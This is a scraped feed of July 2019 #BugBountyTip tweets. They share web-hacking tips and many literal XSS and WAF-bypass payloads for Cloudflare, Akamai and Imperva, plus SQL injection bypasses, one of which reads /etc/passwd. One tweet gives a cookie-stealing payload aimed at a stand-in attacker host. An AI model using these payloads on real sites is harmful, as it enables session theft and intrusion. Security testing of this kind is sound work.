2019-08-01 17:29:00
1 Look what I shared: Bypassing CORS - #Hacker #hackers #BugBountyTip #BugBounty @MIUI| https://t.co/Q8f8YDZhf5
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-01 16:00:56
8 I will show you the real impact of the #XSS #BugBountyTip #security when you find the reflection use payload: on[whatevereventworks]= "location=`http://attackersitecom/?`+cookie"> attackersite will get user cookies. this is how XSS works!
emir c a
@emirca_


2019-08-01 12:36:03
0 Searching for XSS vulnerabilities all day and night. Still couldn't find anything. Maybe looking the wrong place with wrong keys. #BugBounty #BugBountyTip
Bogdan Bodishtyanu
@xalerafera


2019-08-01 12:34:52
0 If you come across requests with the OPTIONS method, do not miss them. Try changing them to the GET method and try to find XSS and SQL injection vulnerabilities! Good luck for hunting. #BugBountyTip #Hacker0x01 #TogetherWeHitHarder https://t.co/8ZsBWwzJ3O
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 12:21:36
3 Another way to use throw without a semi-colon: 👾 <script /***/>~/***/confirm(´\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450´~)/***/</script /***/ #WAF #BugBounty #BugBountyTip #infosec
Imran Parray
@CreedHackers


2019-08-01 12:03:17
4 Steal it like you own it. #TIP: 1- Collect endpoints/parameters from the API request. 2- Make a Brute-force List . 3-Now use that list to recursively bruteforce all the API endpoint. #BugBountyTip #infosec #Cybersecurity @Bugcrowd https://t.co/HGqFYKSOQs
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 10:41:54
1 Unusual data load encrypted with Base64 can be useful when passing through a web firewall filter. 👾 <svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//> #WAF #BugBounty #BugBountyTip #infosec
expl0itc0der
@vanshitmalhotra


2019-08-01 10:14:22
0 #BugBountyTip — Follow reddit/r/bugbounty ! Interesting #BugBounty writeups shared almost every day !
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-01 09:39:41
0 100 people did it wrong 😂 always try to play with token, sometimes server side, it isn't checked properly #BugBountyTip https://t.co/ouioxKziDq
Jason Sewell
@sewell_jason


2019-08-01 08:31:31
0 TFW you know you're in a #docker container. #pentesting #BugBountyTip https://t.co/SfA0p6ERZx
Ammar Amer
@cry__pto


2019-08-01 08:01:39
2 the best BugBounty books to read. consider them one book. real world bughunting:will learn you how to find bugs based on real world reports Bug Bounty Hunting Essentials;will learn you how to find bugs based on practical effective pentesting methods. #BugBountyTip #BugBounty https://t.co/3vZcTV80E8
SaadAhmed
@XSaadAhmedX


2019-08-01 07:02:26
7 Here Is the Write-up how I bypass the CORS to steal the victim account information 🧐🧐 https://t.co/Z95XcdIAKx #bugbountytip #bugbountytips #bugbounty @Bugcrowd

@pouyana1


2019-08-01 03:21:17
0 found a bug in microsoft outlook web app : everyone sends me an email, the mail won't deliver and he/she will automatically sign out after that 😂😂 will make a video for it soon #bugbounty #BugBountyTip #infosec #Microsoft #hack #hacking
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 00:13:26
1 XSS load has been found interesting but effective: " onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//> #WAF #BugBounty #BugBountyTip #infosec https://t.co/gxXVGVvV3w
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 23:56:33
0 Interesting XSS For example, enter where Id = 123 is reflected in the JSON body inside the code label. ? If you send id = </ script>, the application will delete the entry. This,? Id ["</ script>"] = 123 can be skipped. #WAF #BugBounty #BugBountyTip #infosec #developer https://t.co/f3RMj0nTce
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 22:50:37
0 Xss using css: <style>img{background-image:url('javascript:alert(1)')}</style> Firewall bypass: <style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style> #WAF #BugBounty #BugBountyTip #infosec
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 21:06:47
1 @brutelogic { XSS } test results in successful payload bro. https://t.co/pFNM1awbI5</script><svg><script>alert(1337)%0A--> #payload #BugBounty #BugBountyTip #WAF
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 20:58:06
0 Another bypass DotDefender WAF 👾 <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme #WAF #BugBounty #BugBountyTip #infosec
Andri Wahyudi 🕊️ ‏
@andripwn


2019-07-31 20:35:20
1 Skip XSS filters with CloudFlare{}; 😊 <select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x> #WAF #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 18:43:01
1 R.I.P. Fixed a chip with bypass cloud glare. 💉 but also jumps {cloudflare}: '"><iframe srcdoc='%26lt;script>;prompt${document.domain}%26lt;/script>'> #WAF #BugBounty #BugBountyTip #infosec #bypass #vulnerability #security #exploit
Mohammed Rishin
@mohd_rishin


2019-07-31 17:27:30
1 This bug allowed everyone to apply for #Google CEO's position . #Googlejob #HiringNow #hiring #LinkedIn #bug #bugbountytip #dataprivacy #jobseekers #job #fraud #marketing #business #entrepreneur #organization Read More: http: https://t.co/rlE7n7PnRi
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 16:25:38
0 Another { WAF CloudFlare bypass } that works on angle brackets and looks like it: It can work without an iframe. It's not fixed yet. 🕸️ xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'> #WAF #BugBounty #BugBountyTip #infosec
Dhamu
@Dhamuharker


2019-07-31 15:53:21
0 #bugbountytips #BugBounty #bugbountytip #ItTakesACrowd #TogetherWeHitHarder If you are able to exploit Apache | Server Status try these things, you may end up getting the Server Status Access GET /server-status/common.htm https://t.co/GqiZVfFDgR
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 14:14:45
2 { ontouch * } handlers for mobile XSS 🧐 <body ontouchstart=alert(1)> <body ontouchend=alert(1)> <body ontouchmove=alert(1)> #WAF #BugBounty #BugBountyTip #infosec
BarMosseri
@MosseriBar


2019-07-31 14:02:16
0 Looking for someone to do with him bounty #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 13:55:36
0 To include an image via url: Enter #payload: { https://x onerror=alert(1) }; #WAF #BugBounty #BugBountyTip #infosec https://t.co/8pKwE3FaIq
intigriti
@intigriti


2019-07-31 11:55:17
0 Tip of the day: check for exposed Slack tokens using @streaak's #BugBountyTip and find out if hackers could have been snooping on your Slack conversations. 👀 https://t.co/jh41qZJkgb
Petko D. Petkov
@pdp


2019-07-31 11:52:12
0 One of my critical issues (disclosure of credentials and API tokens) was just downgraded to Low because it affects non-prod environments. Obviously I disagree but such is life. $250 #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 11:42:34
0 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #WAF #BugBounty #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-07-31 11:14:39
3 Faxploit: Breaking the Unthinkable https://t.co/I0erESpyd7 Follow Us for Cyber Security Trainings https://t.co/iNczOcGmCt #bugbounty #bugbountytip #penetrationtesting #pentesting #devops #devsecops #hacking
expl0itc0der
@vanshitmalhotra


2019-07-31 11:07:14
1 The Art of Man-in-the-Middle Attack https://t.co/XNvtS3duJ1 #bugBounty #bugbountytip #penetrationtesting #devops #devsecops #hacking #training #securitytraining #ceh
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 10:34:39
0 {xSS}; payload to ByPass CloudFlare protection. <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> #WAF #BugBounty #BugBountyTip
max_shah_aqi
@aqibshah


2019-07-31 07:53:21
1 #Bugbountytip: To include an image via url: Enter #payload: https://x onerror=alert(1) #xss #BugBounty https://t.co/GGTm3PH1m1
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 07:50:24
2 Cloudflare #XSS #Bypass via dot 😎 "<BODY onload!#$%&()*~+-_.###:;[email protected][/|\]^`=alert(“XSS”)>" #WAF #BugBounty #BugBountyTip
Ammar Amer
@cry__pto


2019-07-30 23:45:02
2 html injection and content spoofing in the wild: -WITHIN SECURITY CONTENT SPOOFING: https://t.co/s7Xbpfrmgd -HACKERONE UNINTENDED HTML INCLUDE FIX BYPASS: https://t.co/lBF8pNKZP9 -THROUGH CHARACTER ENCODING: https://t.co/6W1u73x52P #bugbountytip #Hacking #Pentesting
m0z
@LooseSecurity


2019-07-30 23:34:54
1 #BugBounty #bugbountytip #bugbountytips #infosec Yes, CRLF injection "exists", but don't waste time on it. I see a lot of people trying to get header injection via CRLFs and it's really not going to happen... It's so rare these days. Your time is better spent on something else.
Navneet
@na5n33t


2019-07-30 19:26:07
1 Team adds the token parameter to avoid CSRF but forget to check even presence of token parameter is mandatory or not. 😅 I removed the token parameter and CSRF works as charm. 🙊Then look for other request and it also acts same 🙊 #bugbounty #bugbountytip #infosec
(((Gamliel)))
@Gamliel_InfoSec


2019-07-30 19:17:10
0 "Always go for the highest impact!" -Hussein Daher #bugbounty #bugbountytips #bugbountytip https://t.co/2O5NWuPVLu
Ashish Kunwar
@D0rkerDevil


2019-07-30 18:10:51
0 #bugbountytip: look into feedback forms and contact-us forms for smtp injection
SECARMY
@secarmyofficial


2019-07-30 17:17:26
0 Check out our Introduction to Our Bug Bounty Course Watch on Youtube Now https://t.co/EQPAUJUJ8c #wearesecarmy #bugbounty #bugbountytip #hacking #training #infosec https://t.co/NJgwu5upbH
Ammar Amer
@cry__pto


2019-07-30 14:58:00
1 new articles as a pdf files has been uploaded to my github. repository,the number of articles will continue to get higher until it reach 2000 articles as a pdf files the path to new articles https://t.co/gtsrUpWfF6 #bugbountytip #BugBounty #OSINT #Hacking #PenTest #CyberSecurity https://t.co/U4YyF3zRqa
miraitowa
@miraitowa1


2019-07-30 12:45:07
0 Thank you very much for sharing. I look forward to your next [email protected] #BugBounty #bugbountytip Live Bug Bounty Recon Session on Yahoo (Part 1 - 7/14/2019) https://t.co/0DbMDbOSHR via
miraitowa
@miraitowa1


2019-07-30 11:18:18
8 SSRF Trick: SSRF/XSPA in Microsoft’s Bing Webmaster Central by Elber Andre #bugbounty #bugbountytip #SSRF https://t.co/WDDlxRSUh2
Deepak Holani
@w_hat_boy


2019-07-30 07:58:38
0 #bugbountytip : Sometime when u come across for specific features but for that u have to pay just go on Google images type company name .. some people put images that contain end point url which is not under demo feature ..but contain in full specific features
mAshraf
@mAshraf9_


2019-07-30 07:54:07
0 As long as it is a program, a bug may appear. #infosec #BugBounty #bugbountytip #bugbountytips
RHack
@Queseguridad


2019-07-29 23:11:58
0 Akamai Bypass "><marquee%20loop=1%20width=0%20ontoggle=confirm=prompt`${1}`> Imperva Bypass "><details%20open%20ontoggle=confirm(1)> #bugbountytip #bugbountytips #akamaibypass #impervabypass
Jagannath
@SecurityBoy0x01


2019-07-29 15:22:32
0 Spawning a shell : https://t.co/yDo6mISHKt #infosec #bugbountytip #cybersecurity
Jagannath
@SecurityBoy0x01


2019-07-29 15:06:26
1 As I learn about PCI-DSS, I am collating the notes as I go. Here are they if you are interested. https://t.co/QayaJkJVDZ #PCI_DSS #infosec #dataprivacy #bugbountytip
Wh11teW0lf
@Wh11teW0lf


2019-07-29 13:33:36
0 #BugBounty #bugbountytip #bugbountytips # Don't forget for console.log() if alert()/confirm()/prompt() are blocking!
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-29 10:58:18
0 Skip XSS filters with CloudFlare{}; 😊 <select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x> #WAF #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-29 07:50:42
0 (&& = %26%26) sql injection "and" filter bypass %26%26 1=1 #WAF #BugBounty #BugBountyTip #injection #Bypass
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-28 23:39:07
1 Chrome XSS byPass: %00%00%00%00%00%00%00<script%20src=(link: https://t.co/Tek0Fh9NMv) https://t.co/Tek0Fh9NMv ></script> #WAF #BugBounty #BugBountyTip
Sul will be at BlackHat
@pwnb0xes


2019-07-28 23:22:54
0 If a company isn't paying enough for your bug bounty take it to the dark web to get paid! #HIPHOPMUSIC #infosec #bugbountytip #getpaid
Aziz Hakim🇧🇩
@hackerb0y_


2019-07-28 21:18:20
0 While hunting a program I got an admin panel sub, eg: https://t.co/2iAH1i18kT Tried many way to bypass but couldn't succeed! Then entered main program's login info and clicked into login! Guess what? It took me to Admin Panel 🤙 #infosec #bugbountytip #BbWorld19 #bugbounty
MrB0LTv2 (தமிழன்)
@MrB0LTv2


2019-07-28 15:15:39
0 A little reward to a lazy guy for his lazy progress.!!😅 Hopefully, Rewards crossed 1st 1000€!!😋 Thnks @YogoshaOfficial 😍 #bugbountytip = Some things will take time!! And Patience matters..!! #bugbounty #We ❤️ #தமிழன் https://t.co/Bk2UeLp5eX
baluz
@haknfuk


2019-07-28 14:51:23
0 @MrB0LTv2 I like that #bugbountytip
MrB0LTv2 (தமிழன்)
@MrB0LTv2


2019-07-28 14:44:23
0 A little reward to a lazy guy for his lazy progress.!!😅 Hopefully, Rewards crossed First 1000€ Euros!!😋 Thanks to all my well-wishers😍 and yogosha.official 😍 #bugbountytip = Some things will take time!! And… https://t.co/iKQCiQ4wxy
Demolalagos🌍
@Demolalagos1


2019-07-28 14:44:05
0 #bugbountytip If wappalyzer is showing the latest angular version of the site don't think of not getting xss bypass , I used angular xss payload v 1.3.2 on a website using angular js v1.6.4 . Developers do make mistakes... Hope you like the tip. Happy hacking
Ammar Amer
@cry__pto


2019-07-28 11:44:40
2 when you see a Registration page, during a web pentesting operation you should try discover if you can enumerate usernames by trying to register with an existing username. #bugbountytip #BugBounty
Navneet
@na5n33t


2019-07-28 07:59:50
0 The website is protecting the CSRF by checking the Referer header and then this bypass helps. Successfully bypassed and submitted. Let's hope for the bounty. 😄😅 #bugbounty #bugbountytip #infosec “[Critical] Bypass CSRF protection on IBM” by Mohamed Sayed https://t.co/ZOB0m0odX5
Malav Sharma (Wolfdroid)
@ShMalav


2019-07-28 04:46:13
0 #bugbountytip trust me if it's that easy, everybody would be doing it .
Minture
@minturebr


2019-07-28 01:12:59
0 Use tweetdeck to keep an eye on new writeup, tweets, posts. #bugbountytip #bugbountytips #hacking
m0z
@LooseSecurity


2019-07-28 01:02:19
4 #bugbountytip #bugbountytips #infosec #infosecurity Instead of always using <img src=x onerror=alert(0)> why not try: <audio src=x onerror=alert(0)> <video src=x onerror=alert(0)> Or my favorite: <script src=x onerror=alert(0)>
Malav Sharma (Wolfdroid)
@ShMalav


2019-07-27 15:42:19
0 #bugbountytip If wappalyzer is showing the latest angular version of the site don't think of not getting xss bypass , I used angular xss payload v 1.3.2 on a website using angular js v1.6.4 . Developers do make mistakes... Hope you like the tip. Happy hacking
Romansh yadav
@Romanshyadav


2019-07-27 14:10:28
8 Think better!. Book your pass for @bsidesahmedabad on early bird discount now. Pass link: https://t.co/psZDqWoxSt cc: @SecurityBSides @niksthehacker @dipenwadhwa @H4ck3rVishal @InfosecVandana @emgeekboy #conference #workshop #Hackers #bugbountytip #researcher https://t.co/adotzHI76s
Max
@0xw2w


2019-07-27 12:59:31
0 Tip: If you have an API endpoint like /api/v2/****/, try to substitute v* with a less number and look at the reaction. Maybe there is an IDOR or improper auth bug #bugbountytip
JR0ch17
@JR0ch17


2019-07-27 06:26:58
1 #bugbountytip for me tonight is always check if I have an upstream proxy server configured in Burp😅
vavkamil
@vavkamil


2019-07-26 18:10:51
0 XSSwagger v0.1 for detecting old Swagger UI versions vulnerable to XSS attacks #bugbounty #bugbountytip https://t.co/1sKKF9Jusn
Petko D. Petkov
@pdp


2019-07-26 17:42:11
2 Everyone is looking for XSS, SQLI, RCE and SSRF. You might get lucky but you are competing with the world. To be successful at bug bounty hunting one should look for those things no one else is looking for, which may seem harder but actually not hard at all. #bugbountytip
mAshraf
@mAshraf9_


2019-07-26 15:00:47
1 When they say the greatest vulnerability in a SDLC is human beings, they mean there will always be a bug there.😋😋 #infosec #BugBounty #bughunter #bugbountytip
bl4ckh4ck5
@bl4ckh4ck5


2019-07-26 12:46:05
0 @intigriti I reported a clickjacking a short while ago as high because it led to sensitive data exposure. Just make the transparency of the iframe very low and let him steal his own information using ctrl+a and ctrl+c and place that in a separate input field. Make it as a game ;) #bugbountytip
SecuNinja
@secuninja


2019-07-26 11:38:25
0 when <svg/onload=alert(1)> is not working, try without forward slash and add a whitespace <svg onload=alert(1)> #bugbountytip
Dhamu
@Dhamuharker


2019-07-26 11:02:24
0 Oracle WebLogic Server Remote Command Execution #bugbountytips #exploits #webappsec #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder https://t.co/Vx9MVr0olN
Yatin Sharma
@Iam_yatin


2019-07-26 07:26:03
0 Seats are filling so fast. Don't wait ! Grab your @bsidesahmedabad seat now on early bird discount. https://t.co/UWTb7gRxXJ #Conference #workshops #Hacker #bugbountytip #researchers CC: @SecurityBSides @niksthehacker @H4ck3rVishal @dipenwadhwa https://t.co/AID3v5Thnx
Romansh yadav
@Romanshyadav


2019-07-26 06:55:03
1 Seats are filling so fast. Don't wait ! Grab your @bsidesahmedabad seat now on early bird discount. https://t.co/psZDqWoxSt #Conference #workshops #Hacker #bugbountytip #researchers CC: @SecurityBSides @niksthehacker @H4ck3rVishal @dipenwadhwa https://t.co/YUj5U0dvxd
m0z
@LooseSecurity


2019-07-25 15:53:43
0 #BugBounty #bugbountytip #bugbountytips #infosec I think it's worth replacing alert(0) in all your payloads with prompt `0` as it's an easy way to increase the probability of getting a successful #XSS vulnerability!
{{ '127.0.0.1’}}
@shivam31200


2019-07-25 15:36:32
0 So here <script> alert(1)</script> was popping 1 after trying to steal cookie via this <script> alert(document.cookie)</script> Not working :/ Final payload: <script> alert(1)</script> <script> alert(document.cookie)</script> It will popup user cookie #bugbountytip noobtip
Michele Romano
@Mik317_


2019-07-25 14:04:13
0 TIP: If you don't like small scopes, explore also `out-of-scope` subdomains ... you could find juicy endpoints containing CRLF/XSSI issues, that can be used to achieve a concrete impact also on the main domain :) #bugbountytip #BugBounty #bugbountytips (last one: now)
vavkamil
@vavkamil


2019-07-25 11:09:04
1 XSS ontouch* for mobile #bugbountytip https://t.co/WWyNp0FtYu
Petko D. Petkov
@pdp


2019-07-25 07:17:36
0 Reported vulnerability which allows me to takeover corporate accounts, access email and so on - flagged as informative. You are amateurs. #bugbountytip
h3rm17w0lf
@h3rm17w0lf


2019-07-25 05:15:17
0 Ever come across a bug that made you sleepless until you exploited it? I am working on one such and haven’t had a good sleep for two nights. #BugBounty #bugbountytip
Sarvagya Sagar
@0ffensivemitthu


2019-07-25 00:48:57
0 [ #bugbounty #bugbountytip ] - Oauth Hacks 💰 RFC6819 : https://t.co/8NNpx9sqgN Video : https://t.co/t7oarM6fc6 Writeup : https://t.co/que1GGgBK7 or https://t.co/cIRzuyGO7k or https://t.co/tvwk5MPhSq Cheatsheet : https://t.co/KZxpCODZ3L
plenum 🇹🇳
@plenumlab


2019-07-25 00:14:25
1 #bugbountytip when looking for priv esc read the api docs jump to old versions look for interesting calls and watch out for deprecated api endpoints sometimes they continue to use them for backward compatibility. Some functions like invite, join, create, delete... #BugBounty
Ammar Amer
@cry__pto


2019-07-24 22:30:49
1 You can use the fragments plugin in the WebScarab proxy to identify the comments in the HTML source code which may contain useful/sensitive info for the pentester, an easy & fast way to search through the entire source code and find comments. #bugbountytip
pi0wlz
@pi0wlz


2019-07-24 17:29:37
0 if u use gobuster tool for dns enumeration like $ gobuster dns -d https://t.co/ixNnyR6gG7 -t 100 -w common-names.txt -o gobuster-findings, u can parse the output with $ cat gobuster-findings | sed 's/Found: //' > filter.txt #bugbountytip
BarMosseri
@MosseriBar


2019-07-24 14:36:58
0 When you got xss on Hyatt service :) #bugbountytip https://t.co/1oFu9K2Yyr
m0z
@LooseSecurity


2019-07-24 13:47:10
4 One of my favorite #XSS payloads of ALL TIME!!! <input/onfocus=alert(0) autofocus> Perfect for injecting inside of input tags, abusing the 'autofocus' attribute by combining it to an 'onfocus' event handler. #BugBounty #bugbountytip #bugbountytips #infosec #infosecurity
Pedro Henrique Cardoso
@G4L1C


2019-07-24 12:54:07
1 If a sqli target has magic quotes enabled you can avoid this by converting the string to Hex or Char. Example: load_file('/etc/passwd') = load_file(0x2f6574632f706173737764) Or load_file(chars(n1,n2,n2 [...])) #bugbounty #bugbountytip #bugbountytips #sqli
Alin Ciocoiu
@17Akun


2019-07-24 06:24:54
0 Hi. What note taking tools do you use for your projects? Cloud/non- cloud, but free. #pentest #pentesting #bugbountytip #bugbountytips
mayur gupta
@rootmayur


2019-07-24 04:51:13
0 I got 300$ for my submission💰💰 https://t.co/5BcAOrTsHP #bugbountytip #bugcrod #ethicalhacking
Sarvagya Sagar
@0ffensivemitthu


2019-07-24 02:12:32
1 [ What I Learned Today : 03 ] #BugBounty #bugbountytip Indepth Bug Bounty Guide : https://t.co/e89Kne5bWf 💰 Well written blog post by @officialpranj. For newbies in infosec - I recommend reading this blog post twice a week. ~ Thread : #0xWilt : @0xWilt
Sarvagya Sagar
@0ffensivemitthu


2019-07-24 01:47:14
1 [ #Motivation #bugbounty #bugbountytip #infosec ] No one can spoonfeed you everything. You have to do it yourself. You have to be a self learner or independent learner. If you lack the motivation to learn then your infosec career ends here, bcz you’re not going to get far in infosec.
Petko D. Petkov
@pdp


2019-07-23 22:12:59
0 Sometimes it will take 9 months to get your bugs triaged #bugbountytip
Learning Appsec
@learningappsec


2019-07-23 19:00:14
1 Enumerated all the live urls ? next what ? Open all of them at once in your browser using https://t.co/HDt8VcPYSm #bugbountytip #bugbounty #AppSec
Petko D. Petkov
@pdp


2019-07-23 17:52:06
0 Competition is for the suckers #bugbountytip
Proxy
@LinuxKodachi


2019-07-23 17:06:59
0 Want to test your programming and problem solving skills? Here we go : {🕷} https://t.co/QXNsAcMuSL #Developer #programmers #bugbountytip
Pascal S
@PascalSec


2019-07-23 15:04:32
0 #BugBountyTip: If you use an automated Github secret scanner, make also sure to automate the GIT clone URL retrieval. Just created a GIST for that -> https://t.co/TPI4reVPZ1 Let me know if this is helpful and RT 😎
Sarvagya Sagar
@0ffensivemitthu


2019-07-23 14:05:18
2 Hey Guys, Join me and many other infosec aspirants in this group named Nullcrowd - https://t.co/ahMK4OPqkP , The best infosec community. #BugBounty #bugbountytips #bugbountytip #infosec #infosec19 #hacking #programming #programminglife #cybersecurity
d4d
@d4d89704243


2019-07-23 11:47:46
0 Check my new exploit for #image #processing library. This time it is GraphicsMagick https://t.co/OmYiOr2d27 #exploit #bugbountytip #bugbounty
Petko D. Petkov
@pdp


2019-07-23 11:28:24
0 Out of scope bugs are worth reporting - if nothing else you are making a good impression #bugbountytip
midhun
@Midhunryann


2019-07-23 11:24:58
1 @Hacker0x01 bug type :ssrf.. Program :private reward : 300usd First reward #infosec #newbie #bugbounty #bugbountytip https://t.co/KwcO4IP9m6
Sarvagya Sagar
@0ffensivemitthu


2019-07-23 02:02:12
2 [ What I Learned Today : 02 ] #BugBounty #bugbountytip #infosec #bugbountytips How does the internet work : Amazing whitepaper : ~ https://t.co/X3hEqNOUKD 💰 I recommend everyone to read this because this is a building block for infosec 🌈 ~ Thread : #0xWilt
Ameen
@ameenmaali


2019-07-22 22:42:30
0 #bugbountytip: (IDORs) if an endpoint accepts a list of IDs and you get unauthorized for [‘invalidId’] - try [‘validId’, ‘invalidId’]. It’s very possible the validation only occurs on the first element or if any element is valid. Seen it many times
Rubyfu
@Rubyfu


2019-07-22 21:36:20
1 Do you want to bypass Regex based filters? Use regexp-examples gem. It generates a list of all* strings that will match the given regular expression. https://t.co/H42YQhF9na #Rubyfu #OWASP #Pentest #XSS #bugbountytip
bugbountylab
@artofbugbounty


2019-07-22 14:56:43
0 Good references for bounty hunters #OffSec Advanced Web Attacks and Exploitation Resources https://t.co/8zMAn4vtPG #OSWE #bugbountytips #bugbountytip https://t.co/1dMqzPXZij
expl0itc0der
@vanshitmalhotra


2019-07-22 13:07:13
1 A3 - Sensitive Data Exposure OWASP Juice Shop Tutorial - Exploiting Forgot Password #bugbountytip #BugBounty Video Link : https://t.co/wr92be0wXa
Brute Logic
@brutelogic


2019-07-22 12:52:30
4 Use a Microsoft browser like IE11 or Edge. They behave like Burp and curl. #XSS #bugbountytip 😉 https://t.co/xSWgm3EchU
Mohammed Shine
@MohammedShine8


2019-07-22 12:42:29
0 #sqli with no quotes Username: \ Password:||1# #bugbounty #bugbountytip
Khan Sahab 🇮🇳
@UbaidAhmed


2019-07-22 07:46:24
0 Why do many programs not consider taking a screenshot of the Credit Card Information screen as a vulnerability? #bugbounty #bugbountytip #infosec
Ameen
@ameenmaali


2019-07-22 07:31:18
5 Been triaging #bugbounty for a couple years and not once seen a XSS report showing impact - I try to do it for each I find. It’s such an easy way to raise the severity with little effort. Look for ATO (email, password change), access to sensitive data/functionality #bugbountytip
ghostlulz
@ghostlulz1337


2019-07-22 00:14:25
0 Exploit development is the new black. Want to get an easy to understand rundown of buffer overflow attacks check out this : https://t.co/FejHKKoPk4 #bugbountytip #infosec #redteam #exploit #osint #pentest #exploiting #security #Assembly #bufferoverflow #apt #hacking #pentest
Yadhavi
@PrincessYadhavi


2019-07-21 22:51:16
0 After upgrading recon-ng to version 5 in kali, recon-ng does not show any modules. It tells "[*] No modules enabled/installed." How to solve this? #bugbounty #recon-ng #reconng #bugbountytip cc: @LaNMaSteR53
bugbountylab
@artofbugbounty


2019-07-21 17:49:18
1 Get Your Latest Currency Exchange Rates | Refreshing In Every 30 Seconds Mission: Craft a payload link that causes the page stop loading completely through regular expression Denial of Service (ReDoS). https://t.co/8t3nJnhrwr #bugbounty #bugbountytip #bugbountytips #appsec https://t.co/4o3tWcGs4h
pi0wlz
@pi0wlz


2019-07-21 17:37:18
0 #bugbountytip When you run Amass and got a big list with Search engines parse with $ cat amass-findings | sed -e 's/\[[^][]*\]//g' | sed 's/^[ \t]*//;s/[ \t]*$//'
Nikos Gkogkos
@ngkogkos


2019-07-21 11:12:08
1 Love @owaspamass, wordlist masks open so many possibilities! Observing already known subdomains and other naming conventions of the organisation in combination with this could help spot crazy subdomains. #bugbounty #bugbountytip #recon https://t.co/n0iap7t4nZ
Rapid Safeguard
@RapidSafeguard


2019-07-21 04:40:21
0 Self contained htaccess shells and attacks https://t.co/U3THkDJ3Ql #infosec #bugbountytip #bugbounty
bugbountylab
@artofbugbounty


2019-07-21 01:46:24
0 Discover Secret Key from a subdomain disclosed via a Github code repository https://t.co/3MVFLLLHze #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/uztLdgrW5E
محمدن
@mwamiaim


2019-07-20 14:03:15
1 Does anyone have a good resource for SSRF payloads? #bugbountytip #bugbountytips #Bugbounty
bugbountylab
@artofbugbounty


2019-07-20 12:55:50
0 @NathOnSecurity Cool. It's surprising to get rewarded with weak ssl/tls issues. Thanks for the share. #bugbountytips #bugbountytip
Murdockz
@Murdockz_CEH


2019-07-20 12:15:42
1 AWS S3 buckets do not allow for capital letters in the s3 bucket name. Using a tool like @TomNomNom gf will allow you to find all s3 buckets and sometimes they include capital letters. This will allow for s3 bucket takeovers. My recent s3 takeover. #bugbountytip #bugbountytips
bl4de
@_bl4de


2019-07-20 12:14:16
5 Default #passwords list #hacking #itsecurity #bugbountytip #pentesting https://t.co/tldQUMtFDg
bl4de
@_bl4de


2019-07-20 12:11:20
4 #GTFOBins is a curated list of #Unix binaries that can be exploited by an attacker to bypass local security restrictions. #Linux #hacking #itsecurity #DevOps #PenTesting #bugbountytip https://t.co/50z447IFRc
0xd0m7
@0xd0m7


2019-07-20 09:00:10
1 #bugbountytip Sometimes you will receive a 400 bad request if you are fuzzing with double slash: Solved with a match replace rule!! // > / https://t.co/xTMnrhHOOQ
Mehmet Aura
@rootauraw


2019-07-20 06:20:01
1 Yay! I got 125$ from a PRIVATE program on BUGCROWD for UNCLAIMED SOCIAL MEDIA ACCOUNT using my SCRIPT. ❤️ (https://t.co/BcU0KfqJgh ) Thanks to @bugraeskici #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd
bugbountymemes
@bugbounty_memes


2019-07-20 05:49:17
0 Domain has url :- "Example(.)com/abcd/xyz" ! "Inurl:abcd inurl:xyz" helped me to get internal IP (X.X.X.X/abcd/xyz) I got 50$ for this #bugbountytip #hackerone #bugbounty #bugcrowd
Frederick Alcantara
@sirfreddyal


2019-07-20 01:47:15
1 Quick guide on Web App Security for any developers out there https://t.co/qNO9UUaj4f #javascript #dApp #webdev #php #python #bugbounties #bugbountytip #pentest
ghostlulz
@ghostlulz1337


2019-07-19 17:33:27